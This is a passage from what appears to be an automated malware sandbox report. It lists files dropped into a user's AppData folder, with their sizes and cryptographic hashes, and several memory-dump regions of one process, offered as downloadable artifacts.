                                    dc6b5cf18eb9b38819eae455d3672eed0ef32c69

                                    SHA256

                                    11d81c68223fb9f7b0f6e67225aa6239a5ba84b2639294cf93b759fdcf30e35c

                                    SHA512

                                    557a1234d4c68ab49fc4757a4f85bf21b0f48c379f4ab9eba3d909d7d54f2052dcd19a0fafff0f5942b565ae2c089eeca7790ddf06aee1849a0b7477bfec5bc5

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\msvcr100.dll
                                    Filesize

                                    755KB

                                    MD5

                                    0e37fbfa79d349d672456923ec5fbbe3

                                    SHA1

                                    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                                    SHA256

                                    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                                    SHA512

                                    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\pcicapi.dll
                                    Filesize

                                    32KB

                                    MD5

                                    dcde2248d19c778a41aa165866dd52d0

                                    SHA1

                                    7ec84be84fe23f0b0093b647538737e1f19ebb03

                                    SHA256

                                    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                                    SHA512

                                    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

                                    Download Submit

                                  • memory/5884-178-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/5884-149-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/5884-104-0x000001C558F60000-0x000001C558FD6000-memory.dmp

                                    Filesize

                                    472KB

                                    Download

                                  • memory/5884-103-0x000001C558E90000-0x000001C558ED4000-memory.dmp

                                    Filesize

                                    272KB

                                    Download

                                  • memory/5884-254-0x000001C53FAB0000-0x000001C540571000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/5884-102-0x000001C558A90000-0x000001C558AB2000-memory.dmp

                                    Filesize

                                    136KB

                                    Download